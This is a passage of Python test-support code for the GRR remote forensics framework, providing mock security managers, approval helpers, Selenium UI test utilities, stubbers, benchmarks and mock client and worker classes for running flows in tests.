import tempfile
import threading
import time
import unittest
from M2Crypto import X509
from selenium.common import exceptions
from selenium.webdriver.common import keys
from selenium.webdriver.support import select
import logging
import unittest
from grr.client import actions
from grr.client import client_stats
from grr.client import comms
from grr.client import vfs
from grr.lib import access_control
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import email_alerts
from grr.lib import flags
from grr.lib import flow
from grr.lib import maintenance_utils
from grr.lib import queue_manager
from grr.lib import rdfvalue
from grr.lib import registry
# Server components must also be imported even when the client code is tested.
# pylint: disable=unused-import
from grr.lib import server_plugins
# pylint: enable=unused-import
from grr.lib import startup
from grr.lib import utils
from grr.lib import worker
# pylint: disable=unused-import
from grr.lib.flows.caenroll import ca_enroller
# pylint: enable=unused-import
from grr.proto import flows_pb2
from grr.test_data import client_fixture
flags.DEFINE_list("tests", None,
help=("Test module to run. If not specified we run"
"All modules in the test suite."))
flags.DEFINE_list("labels", ["small"],
"A list of test labels to run. (e.g. benchmarks,small).")
class Error(Exception):
"""Test base error."""
class TimeoutError(Error):
"""Used when command line invocations time out."""
class FlowOrderTest(flow.GRRFlow):
"""Tests ordering of inbound messages."""
def __init__(self, *args, **kwargs):
self.messages = []
flow.GRRFlow.__init__(self, *args, **kwargs)
@flow.StateHandler(next_state="Incoming")
def Start(self, unused_message=None):
self.CallClient("Test", data="test",
next_state="Incoming")
@flow.StateHandler(auth_required=True)
def Incoming(self, responses):
"""Record the message id for testing."""
self.messages = []
for _ in responses:
self.messages.append(responses.message.response_id)
class SendingFlowArgs(rdfvalue.RDFProtoStruct):
protobuf = flows_pb2.SendingFlowArgs
class SendingFlow(flow.GRRFlow):
"""Tests sending messages to clients."""
args_type = SendingFlowArgs
@flow.StateHandler(next_state="Process")
def Start(self, unused_response=None):
"""Just send a few messages."""
for unused_i in range(0, self.args.message_count):
self.CallClient("ReadBuffer", offset=0, length=100, next_state="Process")
class BrokenFlow(flow.GRRFlow):
"""A flow which does things wrongly."""
@flow.StateHandler(next_state="Process")
def Start(self, unused_response=None):
"""Send a message to an incorrect state."""
self.CallClient("ReadBuffer", next_state="WrongProcess")
class WellKnownSessionTest(flow.WellKnownFlow):
"""Tests the well known flow implementation."""
well_known_session_id = rdfvalue.SessionID("aff4:/flows/test:TestSessionId")
messages = []
def __init__(self, *args, **kwargs):
flow.WellKnownFlow.__init__(self, *args, **kwargs)
def ProcessMessage(self, message):
"""Record the message id for testing."""
self.messages.append(int(message.args))
class MockSecurityManager(access_control.BaseAccessControlManager):
"""A simple in memory ACL manager which only enforces the Admin label.
This also guarantees that the correct access token has been passed to the
security manager.
Note: No user management, we assume a single test user.
"""
def CheckFlowAccess(self, token, flow_name, client_id=None):
_ = flow_name, client_id
if token is None:
raise RuntimeError("Security Token is not set correctly.")
return True
def CheckHuntAccess(self, token, hunt_urn):
_ = hunt_urn
if token is None:
raise RuntimeError("Security Token is not set correctly.")
return True
def CheckCronJobAccess(self, token, cron_job_urn):
_ = cron_job_urn
if token is None:
raise RuntimeError("Security Token is not set correctly.")
return True
def CheckDataStoreAccess(self, token, subjects, requested_access="r"):
_ = subjects, requested_access
if token is None:
raise RuntimeError("Security Token is not set correctly.")
return True
class GRRBaseTest(unittest.TestCase):
"""This is the base class for all GRR tests."""
install_mock_acl = True
__metaclass__ = registry.MetaclassRegistry
include_plugins_as_attributes = True
# The type of this test.
type = "normal"
def __init__(self, methodName=None): # pylint: disable=g-bad-name
"""Hack around unittest's stupid constructor.
We sometimes need to instantiate the test suite without running any tests -
e.g. to start initialization or setUp() functions. The unittest constructor
requires to provide a valid method name.
Args:
methodName: The test method to run.
"""
super(GRRBaseTest, self).__init__(methodName=methodName or "__init__")
def setUp(self):
super(GRRBaseTest, self).setUp()
# Make a temporary directory for test files.
self.temp_dir = tempfile.mkdtemp(dir=config_lib.CONFIG["Test.tmpdir"])
# Reinitialize the config system each time.
startup.TestInit()
config_lib.CONFIG.SetWriteBack(
os.path.join(self.temp_dir, "writeback.yaml"))
self.base_path = config_lib.CONFIG["Test.data_dir"]
self.token = access_control.ACLToken(username="test",
reason="Running tests")
if self.install_mock_acl:
# Enforce checking that security tokens are propagated to the data store
# but no actual ACLs.
data_store.DB.security_manager = MockSecurityManager()
logging.info("Starting test: %s.%s",
self.__class__.__name__, self._testMethodName)
def tearDown(self):
logging.info("Completed test: %s.%s",
self.__class__.__name__, self._testMethodName)
shutil.rmtree(self.temp_dir, True)
def shortDescription(self): # pylint: disable=g-bad-name
doc = self._testMethodDoc or ""
doc = doc.split("\n")[0].strip()
# Write the suite and test name so it can be easily copied into the --tests
# parameter.
return "\n%s.%s - %s\n" % (
self.__class__.__name__, self._testMethodName, doc)
def _EnumerateProto(self, protobuf):
"""Return a sorted list of tuples for the protobuf."""
result = []
for desc, value in protobuf.ListFields():
if isinstance(value, float):
value = round(value, 2)
try:
value = self._EnumerateProto(value)
except AttributeError:
pass
result.append((desc.name, value))
result.sort()
return result
def assertProtoEqual(self, x, y):
"""Check that an RDFStruct is equal to a protobuf."""
self.assertEqual(self._EnumerateProto(x), self._EnumerateProto(y))
def run(self, result=None): # pylint: disable=g-bad-name
"""Run the test case.
This code is basically the same as the standard library, except that when
there is an exception, the --debug flag allows us to drop into the raising
function for interactive inspection of the test failure.
Args:
result: The testResult object that we will use.
"""
if result is None: result = self.defaultTestResult()
result.startTest(self)
testMethod = getattr(self, self._testMethodName) # pylint: disable=g-bad-name
try:
try:
self.setUp()
except:
# Break into interactive debugger on test failure.
if flags.FLAGS.debug:
pdb.post_mortem()
result.addError(self, sys.exc_info())
# If the setup step failed we stop the entire test suite
# immediately. This helps catch errors in the setUp() function.
raise
ok = False
try:
testMethod()
ok = True
except self.failureException:
# Break into interactive debugger on test failure.
if flags.FLAGS.debug:
pdb.post_mortem()
result.addFailure(self, sys.exc_info())
except KeyboardInterrupt:
raise
except Exception:
# Break into interactive debugger on test failure.
if flags.FLAGS.debug:
pdb.post_mortem()
result.addError(self, sys.exc_info())
try:
self.tearDown()
except KeyboardInterrupt:
raise
except Exception:
# Break into interactive debugger on test failure.
if flags.FLAGS.debug:
pdb.post_mortem()
result.addError(self, sys.exc_info())
ok = False
if ok:
result.addSuccess(self)
finally:
result.stopTest(self)
def MakeUserAdmin(self, username):
"""Makes the test user an admin."""
with aff4.FACTORY.Create("aff4:/users/%s" % username, "GRRUser",
token=self.token.SetUID()) as user:
user.SetLabels("admin")
def GrantClientApproval(self, client_id, token=None):
token = token or self.token
# Create the approval and approve it.
flow.GRRFlow.StartFlow(client_id=client_id,
flow_name="RequestClientApprovalFlow",
reason=token.reason,
subject_urn=rdfvalue.ClientURN(client_id),
approver="approver",
token=token)
self.MakeUserAdmin("approver")
approver_token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(client_id=client_id,
flow_name="GrantClientApprovalFlow",
reason=token.reason,
delegate=token.username,
subject_urn=rdfvalue.ClientURN(client_id),
token=approver_token)
def GrantHuntApproval(self, hunt_urn, token=None):
token = token or self.token
# Create the approval and approve it.
flow.GRRFlow.StartFlow(flow_name="RequestHuntApprovalFlow",
subject_urn=rdfvalue.RDFURN(hunt_urn),
reason=token.reason,
approver="approver",
token=token)
self.MakeUserAdmin("approver")
approver_token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(flow_name="GrantHuntApprovalFlow",
subject_urn=rdfvalue.RDFURN(hunt_urn),
reason=token.reason,
delegate=token.username,
token=approver_token)
def GrantCronJobApproval(self, cron_job_urn, token=None):
token = token or self.token
# Create cron job approval and approve it.
flow.GRRFlow.StartFlow(flow_name="RequestCronJobApprovalFlow",
subject_urn=rdfvalue.RDFURN(cron_job_urn),
reason=self.token.reason,
approver="approver",
token=token)
self.MakeUserAdmin("approver")
approver_token = access_control.ACLToken(username="approver")
flow.GRRFlow.StartFlow(flow_name="GrantCronJobApprovalFlow",
subject_urn=rdfvalue.RDFURN(cron_job_urn),
reason=token.reason,
delegate=token.username,
token=approver_token)
def SetupClients(self, nr_clients):
client_ids = []
for i in range(nr_clients):
client_id = rdfvalue.ClientURN("C.1%015d" % i)
client_ids.append(client_id)
fd = aff4.FACTORY.Create(client_id, "VFSGRRClient", token=self.token)
cert = rdfvalue.RDFX509Cert(
self.ClientCertFromPrivateKey(
config_lib.CONFIG["Client.private_key"]).as_pem())
fd.Set(fd.Schema.CERT, cert)
info = fd.Schema.CLIENT_INFO()
info.client_name = "GRR Monitor"
fd.Set(fd.Schema.CLIENT_INFO, info)
fd.Set(fd.Schema.PING, rdfvalue.RDFDatetime().Now())
fd.Set(fd.Schema.HOSTNAME("Host-%s" % i))
fd.Set(fd.Schema.FQDN("Host-%s.example.com" % i))
fd.Set(fd.Schema.MAC_ADDRESS("aabbccddee%02x" % i))
fd.Close()
return client_ids
def DeleteClients(self, nr_clients):
for i in range(nr_clients):
client_id = rdfvalue.ClientURN("C.1%015d" % i)
data_store.DB.DeleteSubject(client_id, token=self.token)
def RunForTimeWithNoExceptions(self, cmd, argv, timeout=10, should_exit=False,
check_exit_code=False):
"""Run a command line argument and check for python exceptions raised.
Args:
cmd: The command to run as a string.
argv: The args.
timeout: How long to let the command run before terminating.
should_exit: If True we will raise if the command hasn't exited after
the specified timeout.
check_exit_code: If True and should_exit is True, we'll check that the
exit code was 0 and raise if it isn't.
Raises:
RuntimeError: On any errors.
"""
def HandleTimeout(unused_signum, unused_frame):
raise TimeoutError()
exited = False
try:
logging.info("Running : %s", [cmd] + argv)
proc = subprocess.Popen([cmd] + argv, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, bufsize=1)
signal.signal(signal.SIGALRM, HandleTimeout)
signal.alarm(timeout)
stdout = StringIO.StringIO()
while True:
proc.poll()
# Iterate through the output so that we get the output data even if we
# kill the process.
for line in proc.stdout.readline():
stdout.write(line)
if proc.returncode is not None:
exited = True
break
except TimeoutError:
pass # We expect timeouts.
finally:
signal.alarm(0)
try:
proc.kill()
except OSError:
pass # Could already be dead.
proc.stdout.flush()
stdout.write(proc.stdout.read()) # Collect any remaining output.
if "Traceback (" in stdout.getvalue():
raise RuntimeError("Exception found in stderr of binary Stderr:\n###\n%s"
"###\nCmd: %s" % (stdout.getvalue(), cmd))
if should_exit and not exited:
raise RuntimeError("Bin: %s got timeout when when executing, expected "
"exit. \n%s\n" % (stdout.getvalue(), cmd))
if not should_exit and exited:
raise RuntimeError("Bin: %s exited, but should have stayed running.\n%s\n"
% (stdout.getvalue(), cmd))
if should_exit and check_exit_code:
if proc.returncode != 0:
raise RuntimeError("Bin: %s should have returned exit code 0 but got "
"%s" % (cmd, proc.returncode))
def ClientCertFromPrivateKey(self, private_key):
communicator = comms.ClientCommunicator(private_key=private_key)
csr = communicator.GetCSR()
request = X509.load_request_string(csr)
flow_obj = aff4.FACTORY.Create(None, "CAEnroler", token=self.token)
subject = request.get_subject()
cn = rdfvalue.ClientURN(subject.as_text().split("=")[-1])
return flow_obj.MakeCert(cn, request)
def CreateSignedDriver(self):
client_context = ["Platform:Windows", "Arch:amd64"]
# Make sure there is a signed driver for our client.
driver_path = maintenance_utils.UploadSignedDriverBlob(
"MZ Driveeerrrrrr", client_context=client_context,
token=self.token)
logging.info("Wrote signed driver to %s", driver_path)
class EmptyActionTest(GRRBaseTest):
"""Test the client Actions."""
__metaclass__ = registry.MetaclassRegistry
def RunAction(self, action_name, arg=None):
"""Run an action and generate responses.
Args:
action_name: The action to run.
arg: A protobuf to pass the action.
Returns:
A list of response protobufs.
"""
if arg is None:
arg = rdfvalue.GrrMessage()
message = rdfvalue.GrrMessage(name=action_name,
payload=arg)
action_cls = actions.ActionPlugin.classes[message.name]
results = []
# Monkey patch a mock SendReply() method
def MockSendReply(self, reply=None, **kwargs):
if reply is None:
reply = self.out_rdfvalue(**kwargs)
results.append(reply)
old_sendreply = action_cls.SendReply
try:
action_cls.SendReply = MockSendReply
action = action_cls(message=message)
action.grr_worker = FakeClientWorker()
action.Run(arg)
finally:
action_cls.SendReply = old_sendreply
return results
class FlowTestsBaseclass(GRRBaseTest):
"""The base class for all flow tests."""
__metaclass__ = registry.MetaclassRegistry
def setUp(self):
GRRBaseTest.setUp(self)
client_ids = self.SetupClients(1)
self.client_id = client_ids[0]
def tearDown(self):
super(FlowTestsBaseclass, self).tearDown()
data_store.DB.Clear()
def FlowSetup(self, name):
session_id = flow.GRRFlow.StartFlow(client_id=self.client_id,
flow_name=name, token=self.token)
return aff4.FACTORY.Open(session_id, mode="rw", token=self.token)
def SeleniumAction(f):
"""Decorator to do multiple attempts in case of WebDriverException."""
@functools.wraps(f)
def Decorator(*args, **kwargs):
delay = 0.2
num_attempts = 15
cur_attempt = 0
while True:
try:
return f(*args, **kwargs)
except exceptions.WebDriverException as e:
logging.warn("Selenium raised %s", utils.SmartUnicode(e))
cur_attempt += 1
if cur_attempt == num_attempts:
raise
time.sleep(delay)
return Decorator
class ACLChecksDisabledContextManager(object):
def __enter__(self):
self.old_security_manager = data_store.DB.security_manager
data_store.DB.security_manager = access_control.NullAccessControlManager()
return None
def __exit__(self, unused_type, unused_value, unused_traceback):
data_store.DB.security_manager = self.old_security_manager
class Stubber(object):
"""A context manager for doing simple stubs."""
def __init__(self, module, target_name, stub):
self.target_name = target_name
self.module = module
self.stub = stub
def __enter__(self):
self.old_target = getattr(self.module, self.target_name, None)
try:
self.stub.old_target = self.old_target
except AttributeError:
pass
setattr(self.module, self.target_name, self.stub)
def __exit__(self, unused_type, unused_value, unused_traceback):
setattr(self.module, self.target_name, self.old_target)
class MultiStubber(object):
"""A context manager for doing simple stubs."""
def __init__(self, *args):
self.stubbers = [Stubber(*x) for x in args]
def __enter__(self):
for x in self.stubbers:
x.__enter__()
def __exit__(self, t, value, traceback):
for x in self.stubbers:
x.__exit__(t, value, traceback)
class Instrument(object):
"""A helper to instrument a function call.
Stores a copy of all function call args locally for later inspection.
"""
def __init__(self, module, target_name):
self.old_target = getattr(module, target_name)
def Wrapper(*args, **kwargs):
self.args.append(args)
self.kwargs.append(kwargs)
return self.old_target(*args, **kwargs)
self.stubber = Stubber(module, target_name, Wrapper)
self.args = []
self.kwargs = []
def __enter__(self):
self.stubber.__enter__()
return self
def __exit__(self, t, value, traceback):
return self.stubber.__exit__(t, value, traceback)
class GRRSeleniumTest(GRRBaseTest):
"""Baseclass for selenium UI tests."""
# Default duration (in seconds) for WaitUntil.
duration = 5
# Time to wait between polls for WaitUntil.
sleep_time = 0.2
# This is the global selenium handle.
driver = None
# Base url of the Admin UI
base_url = None
# Whether InstallACLChecks() was called during the test
acl_checks_installed = False
def InstallACLChecks(self):
"""Installs AccessControlManager and stubs out SendEmail."""
if self.acl_checks_installed:
return
self.old_security_manager = data_store.DB.security_manager
data_store.DB.security_manager = access_control.FullAccessControlManager()
# Stub out the email function
self.old_send_email = email_alerts.SendEmail
self.emails_sent = []
def SendEmailStub(from_user, to_user, subject, message, **unused_kwargs):
self.emails_sent.append((from_user, to_user, subject, message))
email_alerts.SendEmail = SendEmailStub
self.acl_checks_installed = True
def UninstallACLChecks(self):
"""Deinstall previously installed ACL checks."""
if not self.acl_checks_installed:
return
data_store.DB.security_manager = self.old_security_manager
email_alerts.SendEmail = self.old_send_email
self.acl_checks_installed = False
def ACLChecksDisabled(self):
return ACLChecksDisabledContextManager()
def WaitUntil(self, condition_cb, *args):
for _ in range(int(self.duration / self.sleep_time)):
try:
res = condition_cb(*args)
if res:
return res
# The element might not exist yet and selenium could raise here. (Also
# Selenium raises Exception not StandardError).
except Exception as e: # pylint: disable=broad-except
logging.warn("Selenium raised %s", utils.SmartUnicode(e))
time.sleep(self.sleep_time)
raise RuntimeError("condition not met, body is: %s" %
self.driver.find_element_by_tag_name("body").text)
def ClickUntil(self, target, condition_cb, *args):
for _ in range(int(self.duration / self.sleep_time)):
try:
res = condition_cb(*args)
if res:
return res
# The element might not exist yet and selenium could raise here. (Also
# Selenium raises Exception not StandardError).
except Exception as e: # pylint: disable=broad-except
logging.warn("Selenium raised %s", utils.SmartUnicode(e))
element = self.GetElement(target)
if element:
try:
element.click()
except exceptions.WebDriverException:
pass
time.sleep(self.sleep_time)
raise RuntimeError("condition not met, body is: %s" %
self.driver.find_element_by_tag_name("body").text)
def _FindElement(self, selector):
try:
selector_type, effective_selector = selector.split("=", 1)
except ValueError:
effective_selector = selector
selector_type = None
if selector_type == "css":
elems = self.driver.execute_script(
"return $(\"" + effective_selector.replace("\"", "\\\"") + "\");")
if not elems:
raise exceptions.NoSuchElementException()
else:
return elems[0]
elif selector_type == "link":
links = self.driver.find_elements_by_partial_link_text(effective_selector)
for l in links:
if l.text.strip() == effective_selector:
return l
raise exceptions.NoSuchElementException()
elif selector_type == "xpath":
return self.driver.find_element_by_xpath(effective_selector)
elif selector_type == "id":
return self.driver.find_element_by_id(effective_selector)
elif selector_type == "name":
return self.driver.find_element_by_name(effective_selector)
elif selector_type is None:
if effective_selector.startswith("//"):
return self.driver.find_element_by_xpath(effective_selector)
else:
return self.driver.find_element_by_id(effective_selector)
else:
raise RuntimeError("unknown selector type %s" % selector_type)
@SeleniumAction
def Open(self, url):
self.driver.get(self.base_url + url)
def WaitUntilNot(self, condition_cb, *args):
self.WaitUntil(lambda: not condition_cb(*args))
def IsElementPresent(self, target):
try:
self._FindElement(target)
return True
except exceptions.NoSuchElementException:
return False
def GetElement(self, target):
try:
return self._FindElement(target)
except exceptions.NoSuchElementException:
return None
def GetVisibleElement(self, target):
try:
element = self._FindElement(target)
if element.is_displayed():
return element
except exceptions.NoSuchElementException:
pass
return None
def IsTextPresent(self, text):
return self.AllTextsPresent([text])
def AllTextsPresent(self, texts):
body = self.driver.find_element_by_tag_name("body").text
for text in texts:
if utils.SmartUnicode(text) not in body:
return False
return True
def IsVisible(self, target):
element = self.GetElement(target)
return element and element.is_displayed()
def GetText(self, target):
element = self.WaitUntil(self.GetVisibleElement, target)
return element.text.strip()
def GetValue(self, target):
return self.GetAttribute(target, "value")
def GetAttribute(self, target, attribute):
element = self.WaitUntil(self.GetVisibleElement, target)
return element.get_attribute(attribute)
def WaitForAjaxCompleted(self):
self.WaitUntilEqual("", self.GetAttribute,
"css=[id=ajax_spinner]", "innerHTML")
@SeleniumAction
def Type(self, target, text, end_with_enter=False):
element = self.WaitUntil(self.GetVisibleElement, target)
element.clear()
element.send_keys(text)
if end_with_enter:
element.send_keys(keys.Keys.ENTER)
# We experienced that Selenium sometimes swallows the last character of the
# text sent. Raising an exception here will just retry in that case.
if not end_with_enter:
if text != self.GetValue(target):
raise exceptions.WebDriverException("Send_keys did not work correctly.")
@SeleniumAction
def Click(self, target):
# Selenium clicks elements by obtaining their position and then issuing a
# click action in the middle of this area. This may lead to misclicks when
# elements are moving. Make sure that they are stationary before issuing
# the click action (specifically, using the bootstrap "fade" class that
# slides dialogs in is highly discouraged in combination with .Click()).
self.WaitForAjaxCompleted()
element = self.WaitUntil(self.GetVisibleElement, target)
element.click()
def ClickUntilNotVisible(self, target):
self.WaitUntil(self.GetVisibleElement, target)
self.ClickUntil(target, lambda x: not self.IsVisible(x), target)
@SeleniumAction
def Select(self, target, label):
element = self.WaitUntil(self.GetVisibleElement, target)
select.Select(element).select_by_visible_text(label)
def GetSelectedLabel(self, target):
element = self.WaitUntil(self.GetVisibleElement, target)
return select.Select(element).first_selected_option.text.strip()
def IsChecked(self, target):
return self.WaitUntil(self.GetVisibleElement, target).is_selected()
def GetCssCount(self, target):
if not target.startswith("css="):
raise ValueError("invalid target for GetCssCount: " + target)
return len(self.driver.find_elements_by_css_selector(target[4:]))
def WaitUntilEqual(self, target, condition_cb, *args):
for _ in range(int(self.duration / self.sleep_time)):
try:
if condition_cb(*args) == target:
return True
# The element might not exist yet and selenium could raise here. (Also
# Selenium raises Exception not StandardError).
except Exception as e: # pylint: disable=broad-except
logging.warn("Selenium raised %s", utils.SmartUnicode(e))
time.sleep(self.sleep_time)
raise RuntimeError("condition not met, body is: %s" %
self.driver.find_element_by_tag_name("body").text)
def WaitUntilContains(self, target, condition_cb, *args):
data = ""
target = utils.SmartUnicode(target)
for _ in range(int(self.duration / self.sleep_time)):
try:
data = condition_cb(*args)
if target in data:
return True
# The element might not exist yet and selenium could raise here.
except Exception as e: # pylint: disable=broad-except
logging.warn("Selenium raised %s", utils.SmartUnicode(e))
time.sleep(self.sleep_time)
raise RuntimeError("condition not met. Got %r" % data)
def setUp(self):
super(GRRSeleniumTest, self).setUp()
# Make the user use the advanced gui so we can test it.
with aff4.FACTORY.Create(
aff4.ROOT_URN.Add("users/test"), aff4_type="GRRUser", mode="w",
token=self.token) as user_fd:
user_fd.Set(user_fd.Schema.GUI_SETTINGS(mode="ADVANCED"))
self.InstallACLChecks()
def tearDown(self):
self.UninstallACLChecks()
super(GRRSeleniumTest, self).tearDown()
class AFF4ObjectTest(GRRBaseTest):
"""The base class of all aff4 object tests."""
__metaclass__ = registry.MetaclassRegistry
client_id = rdfvalue.ClientURN("C." + "B" * 16)
class MicroBenchmarks(GRRBaseTest):
"""This base class created the GRR benchmarks."""
__metaclass__ = registry.MetaclassRegistry
# Increase this for more accurate timing information.
REPEATS = 1000
units = "us"
def setUp(self):
super(MicroBenchmarks, self).setUp()
# We use this to store temporary benchmark results.
self.benchmark_scratchpad = [
["Benchmark", "Time (%s)", "Iterations"],
["---------", "---------", "----------"]]
def tearDown(self):
f = 1
if self.units == "us":
f = 1e6
elif self.units == "ms":
f = 1e3
if len(self.benchmark_scratchpad) > 2:
print "\nRunning benchmark %s: %s" % (self._testMethodName,
self._testMethodDoc or "")
for row in self.benchmark_scratchpad:
if isinstance(row[1], (int, float)):
row[1] = "%10.4f" % (row[1] * f)
elif "%" in row[1]:
row[1] %= self.units
if len(row) == 4 and isinstance(row[-1], (basestring, int, float)):
print "{0:45} {1:<20} {2:<20} ({3})".format(*row)
else:
print "{0:45} {1:<20} {2:<20}".format(*row)
print
def TimeIt(self, callback, name=None, repetitions=None, pre=None, **kwargs):
"""Runs the callback repetitively and returns the average time."""
if repetitions is None:
repetitions = self.REPEATS
if name is None:
name = callback.__name__
if pre is not None:
pre()
start = time.time()
for _ in xrange(repetitions):
v = callback(**kwargs)
time_taken = (time.time() - start)/repetitions
self.AddResult(name, time_taken, repetitions, v)
def AddResult(self, name, time_taken, repetitions, v=None):
self.benchmark_scratchpad.append(
[name, time_taken, repetitions, v])
class GRRTestLoader(unittest.TestLoader):
"""A test suite loader which searches for tests in all the plugins."""
# This should be overridden by derived classes. We load all tests extending
# this class.
base_class = None
def __init__(self, labels=None):
super(GRRTestLoader, self).__init__()
if labels is None:
labels = set(flags.FLAGS.labels)
self.labels = set(labels)
def getTestCaseNames(self, testCaseClass):
"""Filter the test methods according to the labels they have."""
result = []
for test_name in super(GRRTestLoader, self).getTestCaseNames(testCaseClass):
test_method = getattr(testCaseClass, test_name)
# If the method is not tagged, it will be labeled "small".
test_labels = getattr(test_method, "labels", set(["small"]))
if self.labels and not self.labels.intersection(test_labels):
continue
result.append(test_name)
return result
def loadTestsFromModule(self, _):
"""Just return all the tests as if they were in the same module."""
test_cases = [
self.loadTestsFromTestCase(x) for x in self.base_class.classes.values()
if issubclass(x, self.base_class)]
return self.suiteClass(test_cases)
def loadTestsFromName(self, name, module=None):
"""Load the tests named."""
parts = name.split(".")
try:
test_cases = self.loadTestsFromTestCase(self.base_class.classes[parts[0]])
except KeyError:
raise RuntimeError("Unable to find test %r - is it registered?" % name)
# Specifies the whole test suite.
if len(parts) == 1:
return self.suiteClass(test_cases)
elif len(parts) == 2:
cls = self.base_class.classes[parts[0]]
return unittest.TestSuite([cls(parts[1])])
class MockClient(object):
def __init__(self, client_id, client_mock, token=None):
if not isinstance(client_id, rdfvalue.ClientURN):
raise RuntimeError("Client id must be an instance of ClientURN")
if client_mock is None:
client_mock = InvalidActionMock()
self.client_id = client_id
self.client_mock = client_mock
self.token = token
# Well known flows are run on the front end.
self.well_known_flows = flow.WellKnownFlow.GetAllWellKnownFlows(token=token)
def PushToStateQueue(self, message, **kw):
# Assume the client is authorized
message.auth_state = rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED
# Update kw args
for k, v in kw.items():
setattr(message, k, v)
# Handle well known flows
if message.request_id == 0:
# Well known flows only accept messages of type MESSAGE.
if message.type == rdfvalue.GrrMessage.Type.MESSAGE:
# Assume the message is authenticated and comes from this client.
message.SetWireFormat(
"source", utils.SmartStr(self.client_id.Basename()))
message.auth_state = "AUTHENTICATED"
session_id = message.session_id
logging.info("Running well known flow: %s", session_id)
self.well_known_flows[str(session_id)].ProcessMessage(message)
return
with queue_manager.QueueManager(token=self.token) as manager:
manager.QueueResponse(message.session_id, message)
def Next(self):
# Grab tasks for us from the queue.
with queue_manager.QueueManager(token=self.token) as manager:
request_tasks = manager.QueryAndOwn(self.client_id.Queue(),
limit=1,
lease_seconds=10000)
for message in request_tasks:
response_id = 1
# Collect all responses for this message from the client mock
try:
if hasattr(self.client_mock, "HandleMessage"):
responses = self.client_mock.HandleMessage(message)
else:
responses = getattr(self.client_mock, message.name)(message.payload)
if not responses:
responses = []
logging.info("Called client action %s generating %s responses",
message.name, len(responses) + 1)
status = rdfvalue.GrrStatus()
except Exception as e: # pylint: disable=broad-except
logging.exception("Error %s occurred in client", e)
# Error occurred.
responses = []
status = rdfvalue.GrrStatus(
status=rdfvalue.GrrStatus.ReturnedStatus.GENERIC_ERROR)
# Now insert those on the flow state queue
for response in responses:
if isinstance(response, rdfvalue.GrrStatus):
msg_type = rdfvalue.GrrMessage.Type.STATUS
response = rdfvalue.GrrMessage(
session_id=message.session_id, name=message.name,
response_id=response_id, request_id=message.request_id,
payload=response,
type=msg_type)
elif not isinstance(response, rdfvalue.GrrMessage):
msg_type = rdfvalue.GrrMessage.Type.MESSAGE
response = rdfvalue.GrrMessage(
session_id=message.session_id, name=message.name,
response_id=response_id, request_id=message.request_id,
payload=response,
type=msg_type)
# Next expected response
response_id = response.response_id + 1
self.PushToStateQueue(response)
# Add a Status message to the end
self.PushToStateQueue(message, response_id=response_id,
payload=status,
type=rdfvalue.GrrMessage.Type.STATUS)
# Additionally schedule a task for the worker
manager.NotifyQueue(message.session_id,
priority=message.priority)
return len(request_tasks)
class MockThreadPool(object):
"""A mock thread pool which runs all jobs serially."""
def __init__(self, *_):
pass
def AddTask(self, target, args, name="Unnamed task"):
_ = name
try:
target(*args)
# The real threadpool can not raise from a task. We emulate this here.
except Exception as e: # pylint: disable=broad-except
logging.exception("Thread worker raised %s", e)
def Join(self):
pass
class MockWorker(worker.GRRWorker):
"""Mock the worker."""
# Resource accounting off by default, set these arrays to emulate CPU and
# network usage.
USER_CPU = [0]
SYSTEM_CPU = [0]
NETWORK_BYTES = [0]
def __init__(self, queue=worker.DEFAULT_WORKER_QUEUE,
check_flow_errors=True, token=None):
self.queue = queue
self.check_flow_errors = check_flow_errors
self.token = token
self.pool = MockThreadPool("MockWorker_pool", 25)
# Collect all the well known flows.
self.well_known_flows = flow.WellKnownFlow.GetAllWellKnownFlows(token=token)
# Simple generators to emulate CPU and network usage
self.cpu_user = itertools.cycle(self.USER_CPU)
self.cpu_system = itertools.cycle(self.SYSTEM_CPU)
self.network_bytes = itertools.cycle(self.NETWORK_BYTES)
def Simulate(self):
while self.Next():
pass
self.pool.Join()
def Next(self):
"""Very simple emulator of the worker.
We wake each flow in turn and run it.
Returns:
total number of flows still alive.
Raises:
RuntimeError: if the flow terminates with an error.
"""
with queue_manager.QueueManager(token=self.token) as manager:
sessions_available = manager.GetSessionsFromQueue(self.queue)
sessions_available = [rdfvalue.SessionID(session_id)
for session_id in sessions_available]
# Run all the flows until they are finished
run_sessions = []
# Only sample one session at the time to force serialization of flows
# after each state run - this helps to catch unpickleable objects.
for session_id in sessions_available[:1]:
manager.DeleteNotification(session_id)
run_sessions.append(session_id)
# Handle well known flows here.
if session_id in self.well_known_flows:
self.well_known_flows[session_id].ProcessRequests(
self.pool)
continue
with aff4.FACTORY.OpenWithLock(
session_id, token=self.token, blocking=False) as flow_obj:
# Run it
with flow_obj.GetRunner() as runner:
cpu_used = runner.context.client_resources.cpu_usage
user_cpu = self.cpu_user.next()
system_cpu = self.cpu_system.next()
network_bytes = self.network_bytes.next()
cpu_used.user_cpu_time += user_cpu
cpu_used.system_cpu_time += system_cpu
runner.context.network_bytes_sent += network_bytes
runner.ProcessCompletedRequests(self.pool)
if (self.check_flow_errors and
runner.context.state == rdfvalue.Flow.State.ERROR):
logging.exception("Flow terminated in state %s with an error: %s",
runner.context.current_state,
runner.context.backtrace)
raise RuntimeError(runner.context.backtrace)
return run_sessions
class FakeClientWorker(comms.GRRClientWorker):
"""A Fake GRR client worker which just collects SendReplys."""
def __init__(self):
self.responses = []
self.sent_bytes_per_flow = {}
self.lock = threading.RLock()
self.stats_collector = client_stats.ClientStatsCollector(self)
def __del__(self):
pass
def SendReply(self, rdf_value,
message_type=rdfvalue.GrrMessage.Type.MESSAGE, **kw):
message = rdfvalue.GrrMessage(
type=message_type, payload=rdf_value, **kw)
self.responses.append(message)
class ActionMock(object):
"""A client mock which runs a real action.
This can be used as input for TestFlowHelper.
It is possible to mix mocked actions with real actions. Simple extend this
class and add methods for the mocked actions, while instantiating with the
list of read actions to run:
class MixedActionMock(ActionMock):
def __init__(self):
super(MixedActionMock, self).__init__("RealAction")
def MockedAction(self, args):
return []
Will run the real action "RealAction" at the same time as a mocked action
MockedAction.
"""
def __init__(self, *action_names):
self.action_names = action_names
self.action_classes = dict(
[(k, v) for (k, v) in actions.ActionPlugin.classes.items()
if k in action_names])
self.action_counts = dict((x, 0) for x in action_names)
def HandleMessage(self, message):
message.auth_state = rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED
client_worker = FakeClientWorker()
# We allow special methods to be specified for certain actions.
